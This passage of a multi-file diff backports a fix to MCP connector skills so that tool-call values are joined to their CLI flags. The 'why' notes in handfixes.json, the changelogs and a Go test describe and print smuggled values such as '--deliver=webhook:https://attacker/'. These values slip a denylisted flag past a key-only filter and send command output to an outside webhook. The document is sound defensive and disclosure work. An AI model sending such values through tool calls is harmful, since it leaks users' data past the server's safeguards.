+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/liongard/handfixes.json
+++ b/skills/liongard/handfixes.json
@@ -235,8 +235,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -246,7 +258,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/liongard/handfixes.json
+++ b/skills/liongard/handfixes.json
@@ -220,6 +220,35 @@
      "min_count": 3
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/maxio/CHANGELOG.md
+++ b/skills/maxio/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/maxio/CHANGELOG.md
+++ b/skills/maxio/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/maxio/CHANGELOG.md
+++ b/skills/maxio/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/maxio/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/maxio/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/maxio/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/maxio/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/maxio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/maxio/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/maxio/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/maxio/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/maxio/handfixes.json
+++ b/skills/maxio/handfixes.json
@@ -171,6 +171,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/maxio/handfixes.json
+++ b/skills/maxio/handfixes.json
@@ -186,8 +186,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -197,7 +209,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/microsoft-graph/CHANGELOG.md
+++ b/skills/microsoft-graph/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.2] - 2026-08-26

--- a/skills/microsoft-graph/CHANGELOG.md
+++ b/skills/microsoft-graph/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.2.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.2.2] - 2026-08-26
 
 ### Fixed

--- a/skills/microsoft-graph/CHANGELOG.md
+++ b/skills/microsoft-graph/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.2] - 2026-08-26
 

--- a/skills/microsoft-graph/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/microsoft-graph/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/microsoft-graph/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/microsoft-graph/handfixes.json
+++ b/skills/microsoft-graph/handfixes.json
@@ -198,8 +198,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -209,7 +221,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/microsoft-graph/handfixes.json
+++ b/skills/microsoft-graph/handfixes.json
@@ -183,6 +183,35 @@
